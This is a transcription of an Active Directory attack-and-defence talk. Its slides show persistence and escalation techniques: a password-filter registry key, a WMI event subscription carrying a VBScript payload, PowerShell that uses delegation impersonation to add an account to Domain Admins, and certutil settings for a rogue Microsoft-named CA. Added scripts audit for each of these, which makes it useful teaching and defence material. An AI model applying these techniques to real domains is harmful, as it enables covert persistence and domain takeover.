
Ing. Ondrej Sevecek MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012 | What would a real hacker do to your AD.


1 What would a real hacker do to your AD
  Ing. Ondrej Sevecek, MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012
  ondrej@sevecek.com | www.gopas.cz

2 Intro
   What happens when they take one of your DCs?
   You are doomed
    – must reinstall the whole forest from scratch
    – may be able to restore the whole forest from the last clean backup, provided you are sure the intrusion will not happen again

3 Why do I show these things
   Secure machines physically
   Do not use domain admin credentials on insecure machines
   Separate administrative accounts
   Never use admin accounts to access services
   Stress strong passwords, or rather use smart cards

4 Agenda
   Physical DC security
   Password filters
   Hidden accounts
   Hidden scheduled tasks
   Forest is a security boundary
   Exploiting Kerberos delegation
   Logon without passwords

5 Physical DC security
   Having physical access means you have full power over data, settings and binaries
    – partially substitute physical security with BitLocker and TPM
    – use RODCs at insecure locations
   Hardware keyloggers
   Reboot and offline modifications

6 Password filters
   A password change/reset after an attack means nothing
   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\NotificationPackages = MULTI_SZ
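The defensive counterpart to this slide is to know exactly which password-filter DLLs lsass loads on every DC. The script below is an added example, not part of the presentation: it reads the value on the local machine (the real value name contains a space, "Notification Packages"), compares it against a baseline list and reports the Authenticode status and creation time of each DLL. The baseline names scecli and rassfm are an assumption about a typical domain controller build; replace them with what your own build documentation says.

```powershell
# Added example (not from the presentation): audit the LSA password-filter list on the
# machine this runs on and flag DLLs that are not in your documented baseline.
function Get-LsaNotificationPackageReport {
    param(
        # Assumption: a typical DC carries only scecli and rassfm here. Adjust to your build.
        [string[]]$Baseline = @('scecli', 'rassfm')
    )
    $lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $packages = (Get-ItemProperty -Path $lsaKey -Name 'Notification Packages').'Notification Packages'

    foreach ($name in @($packages)) {
        if ([string]::IsNullOrWhiteSpace($name)) { continue }

        # Each entry is the base name of a DLL that lsass.exe loads from System32 at boot.
        $dll     = Join-Path $env:SystemRoot ('System32\{0}.dll' -f $name)
        $verdict = if ($Baseline -contains $name) { 'baseline' } else { 'UNEXPECTED - review' }

        if (Test-Path -LiteralPath $dll) {
            $sig       = Get-AuthenticodeSignature -FilePath $dll
            $signature = $sig.Status
            $signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            $created   = (Get-Item -LiteralPath $dll).CreationTimeUtc
        } else {
            $signature = 'FileMissing'
            $signer    = $null
            $created   = $null
        }

        [pscustomobject]@{
            Package    = $name
            Verdict    = $verdict
            Path       = $dll
            Signature  = $signature
            Signer     = $signer
            CreatedUtc = $created
        }
    }
}

# Run on every DC (for example through Invoke-Command) and keep the output so that
# later runs can be diffed against it.
Get-LsaNotificationPackageReport | Format-Table -AutoSize
```

A one-off report only proves the state at that moment; pair it with object-access auditing on the Lsa key so that a later change to the value shows up as event 4657 (registry value modified) in the Security log of the DC.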

7 Hidden accounts
   You are never able to do a 100% security audit after an attack
   Not even Domain Admins can see everything

8 Hidden scheduled tasks
   You are never able to do a 100% security audit after an attack
   Not even the prominent audit tools know everything
    – namespace root\subscription
    – ActiveScriptEventConsumer
        Name =
        ScriptEngine = VBScript
        ScriptText = set fso = CreateObject("Scripting.FileSystemObject") : fileName = "c:\hackerFest" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt" : set newFile = fso.CreateTextFile(fileName) : newFile.WriteLine("I will be here for ever!") : newFile.Close()

9 Hidden scheduled tasks
   You are never able to do a 100% security audit after an attack
   … continuing …
    – __EventFilter
        Name =
        QueryLanguage = WQL
        EventNamespace = root\cimv2
        Query = SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9
    – Win32_LocalTime properties that such a query can key on: Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth
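Slides 8 and 9 describe a permanent WMI event subscription: a filter (the WQL query), a consumer (the script) and a binding between the two, none of which appear in Task Scheduler. The script below is an added example, not part of the presentation, that enumerates all three classes in root\subscription on a host and joins them through the bindings so that each active subscription is shown with its query and payload; filters or consumers left without a binding are reported as well. It uses the Get-WmiObject cmdlets of Windows PowerShell 5.1; the computer name parameter and output shape are my own choices.

```powershell
# Added example (not from the presentation): list permanent WMI event subscriptions,
# joining __FilterToConsumerBinding to its __EventFilter and __EventConsumer objects.
function Get-WmiSubscriptionReport {
    param([string]$ComputerName = $env:COMPUTERNAME)
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __FilterToConsumerBinding)

    $boundFilters   = @()
    $boundConsumers = @()

    foreach ($b in $bindings) {
        # Binding references are relative object paths such as  __EventFilter.Name="x"
        # and  ActiveScriptEventConsumer.Name="y"; extract the class and the key.
        $filterName    = if ($b.Filter   -match 'Name="([^"]+)"')        { $Matches[1] } else { [string]$b.Filter }
        $consumerClass = if ($b.Consumer -match '^(\w+)\.Name="')        { $Matches[1] } else { '?' }
        $consumerName  = if ($b.Consumer -match 'Name="([^"]+)"')        { $Matches[1] } else { [string]$b.Consumer }
        $boundFilters   += $filterName
        $boundConsumers += $consumerName

        $f = $filters   | Where-Object { $_.Name -eq $filterName }
        $c = $consumers | Where-Object { $_.Name -eq $consumerName -and $_.__CLASS -eq $consumerClass }

        # The payload property depends on the consumer class: script text for
        # ActiveScriptEventConsumer, a command line for CommandLineEventConsumer.
        $payload = $null
        if ($c.ScriptText)              { $payload = $c.ScriptText }
        elseif ($c.CommandLineTemplate) { $payload = $c.CommandLineTemplate }
        elseif ($c.ExecutablePath)      { $payload = $c.ExecutablePath }

        [pscustomobject]@{
            Computer     = $ComputerName
            Filter       = $filterName
            Query        = $f.Query
            ConsumerType = $consumerClass
            Consumer     = $consumerName
            Payload      = $payload
        }
    }

    # Unbound objects are not active but may be leftovers of a half-removed subscription.
    foreach ($f in $filters | Where-Object { $boundFilters -notcontains $_.Name }) {
        [pscustomobject]@{ Computer = $ComputerName; Filter = $f.Name; Query = $f.Query
                           ConsumerType = '(unbound filter)'; Consumer = $null; Payload = $null }
    }
    foreach ($c in $consumers | Where-Object { $boundConsumers -notcontains $_.Name }) {
        [pscustomobject]@{ Computer = $ComputerName; Filter = $null; Query = $null
                           ConsumerType = "(unbound $($c.__CLASS))"; Consumer = $c.Name; Payload = $c.ScriptText }
    }
}

Get-WmiSubscriptionReport | Format-List
```

Run it across all DCs and compare the output with the small set of subscriptions you expect (on a clean system root\subscription is usually empty or holds only the SCM event log consumer). For ongoing coverage rather than snapshots, Sysmon events 19, 20 and 21 record the creation of filters, consumers and bindings, and the Microsoft-Windows-WMI-Activity/Operational log writes event 5861 when a permanent subscription is registered.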

10 Forest is a security boundary
   Domain Admins of any domain in a forest are effectively Domain Admins in every other domain of that forest
   Site-level GPOs
   No SID filtering inside a forest

11 Subdomain scenario (diagram): forest root gopas.virtual with child domains CZ.gopas.virtual and DE.gopas.virtual

12 Kerberos delegation with protocol transition
   A password is not the only way to log on to network services
    – no credentials are necessary at all
   "Trust this computer for delegation to specified services only"
    – "Use any authentication protocol"

13 Kerberos delegation (diagram): Client (Kamil) → App Server → DB, LDAP, FS

14 Kerberos delegation with protocol transition (diagram): App Server → DB, LDAP, FS, acting as Kamil

15 Delegation with PowerShell
    Adjust-Privilege 7 $true                          # not a built-in cmdlet; presumably the presenter's own helper
    $winId = New-Object System.Security.Principal.WindowsIdentity 'kamil@gopas.cz'
    [Security.Principal.WindowsIdentity]::GetCurrent() # identity before impersonation
    $winId.Impersonate()
    [Security.Principal.WindowsIdentity]::GetCurrent() # identity after impersonation
    $domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual'
    $domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,DC=gopas,DC=virtual')
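Slides 12 to 15 hinge on accounts that are trusted for delegation, in particular with "use any authentication protocol" (protocol transition). The script below is an added example, not part of the presentation: it searches the directory for every account that has unconstrained delegation or protocol transition set in userAccountControl, or any msDS-AllowedToDelegateTo target at all, and decodes the two flags. It uses System.DirectoryServices directly, as the slide does, so no RSAT module is needed; the search base shown is the forest from the slides and the function name is my own.

```powershell
# Added example (not from the presentation): find accounts whose delegation settings let
# a service obtain tickets on behalf of other users.
function Get-DelegationReport {
    param(
        # Assumption: search the default naming context of the current domain unless told otherwise,
        # e.g. -SearchBase 'LDAP://DC=gopas,DC=virtual' for the forest in the slides.
        [string]$SearchBase = ''
    )
    $TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
    $TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")

    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
    $filter = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
              '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' +
              '(msDS-AllowedToDelegateTo=*))'

    $root     = [ADSI]$SearchBase
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, $filter)
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('sAMAccountName', 'userAccountControl', 'msDS-AllowedToDelegateTo', 'objectClass'))

    foreach ($r in $searcher.FindAll()) {
        $uac   = [int]$r.Properties['useraccountcontrol'][0]
        $targets = @($r.Properties['msds-allowedtodelegateto'])
        [pscustomobject]@{
            Account             = [string]$r.Properties['samaccountname'][0]
            ObjectClass         = [string]$r.Properties['objectclass'][-1]
            Unconstrained       = [bool]($uac -band $TRUSTED_FOR_DELEGATION)
            ProtocolTransition  = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            AllowedToDelegateTo = ($targets -join '; ')
        }
    }
}

Get-DelegationReport | Sort-Object ProtocolTransition, Unconstrained -Descending | Format-Table -AutoSize
```

Every row with ProtocolTransition set deserves a documented owner, and a target list that includes LDAP or CIFS on a domain controller is the exact combination the slides exploit. On the other side of the relationship, administrative accounts belong in the Protected Users group or carry the "account is sensitive and cannot be delegated" flag so that no service can impersonate them regardless of how the service's own delegation is configured.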

16 Smart card logon
   A password is not the only way to log on to computers
   NTAuth CA
    – forest-wide trust
    – no need to consult AD or touch LDAP at all
   Notes
    – ldap:///CN=GOPAS%20Root%20Online%20CA,CN=DC1,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=gopas,DC=virtual?certificateRevocationList?base?objectClass=cRLDistributionPoint

17 Fake Microsoft CA
   Something must always be trusted
   Root CA
    – CN=Microsoft Root Authority,OU=Microsoft Corporation,OU=Copyright (c) 1997 Microsoft Corp.
   Code signing cert
    – CN=Microsoft Corporation,OU=MOPR,O=Microsoft Corporation,L=Redmond,S=Washington,C=US

18 Fake Microsoft CA
   Longer validity for issued certificates
    – CERTUTIL -setreg CA\ValidityPeriodUnits 5
   No certificate template name extension
    – CERTUTIL -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.7
   No CRL paths in issued certificates
    – certutil -setreg DBFlags +DBFLAGS_ENABLEVOLATILEREQUESTS
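Slides 16 to 18 turn on one object: the NTAuthCertificates container in the Configuration partition, because any CA listed there is trusted forest-wide for smart card logon, and a rogue CA named after Microsoft (slide 17) only has to get into it once. The script below is an added example, not part of the presentation: it reads every cACertificate value from that object, parses each into an X509Certificate2 and flags any certificate whose thumbprint is not on an allow-list, calling out in particular subjects that borrow a Microsoft name. The allow-list parameter and function name are my own; the expected content of NTAuth is simply your own enterprise CAs, so Microsoft's public roots have no place there.

```powershell
# Added example (not from the presentation): audit the forest NTAuthCertificates store that
# smart card / PKINIT logon trusts, and flag CA certificates outside an allow-list.
function Get-NTAuthReport {
    param(
        # Assumption: the forest's configuration naming context, read from RootDSE by default.
        [string]$ConfigurationDN = ([ADSI]'LDAP://RootDSE').configurationNamingContext,
        # Thumbprints of the enterprise CAs you have documented; everything else is reported.
        [string[]]$ApprovedThumbprints = @()
    )
    $dn    = "CN=NTAuthCertificates,CN=Public Key Services,CN=Services,$ConfigurationDN"
    $entry = [ADSI]"LDAP://$dn"

    # A base-scope search returns the multi-valued cACertificate attribute as one byte[] per value.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher(
        $entry, '(objectClass=*)', [string[]]@('cACertificate'), 'Base')
    $result = $searcher.FindOne()
    if (-not $result) { throw "NTAuthCertificates object not found at $dn" }

    foreach ($raw in $result.Properties['cacertificate']) {
        $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,[byte[]]$raw)
        $approved = $ApprovedThumbprints -contains $cert.Thumbprint

        # Slide 17's rogue root imitates "Microsoft Root Authority"; a Microsoft-named subject that is
        # not one of your own approved CAs is the strongest signal this report can give.
        $verdict = if ($approved) { 'approved' }
                   elseif ($cert.Subject -match 'Microsoft') { 'UNAPPROVED - imitates a Microsoft CA name' }
                   else { 'UNAPPROVED - review' }

        [pscustomobject]@{
            Subject    = $cert.Subject
            Issuer     = $cert.Issuer
            Thumbprint = $cert.Thumbprint
            NotBefore  = $cert.NotBefore
            NotAfter   = $cert.NotAfter
            SelfSigned = ($cert.Subject -eq $cert.Issuer)
            Verdict    = $verdict
        }
    }
}

# Example call with a placeholder thumbprint; replace it with the thumbprints of your own CAs.
Get-NTAuthReport -ApprovedThumbprints @('<THUMBPRINT-OF-YOUR-ENTERPRISE-CA>') | Format-Table -AutoSize
```

Keep the allow-list under change control and run the report after any PKI work, because writing to this object is all it takes to make the forest accept logon certificates from a new issuer. The same comparison is worth repeating against the Enterprise NTAuth cache that clients keep locally, since that copy is what a workstation consults at logon time.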

19 ondrej@sevecek.com www.sevecek.com www.gopas.cz Thank you! and Watch out!
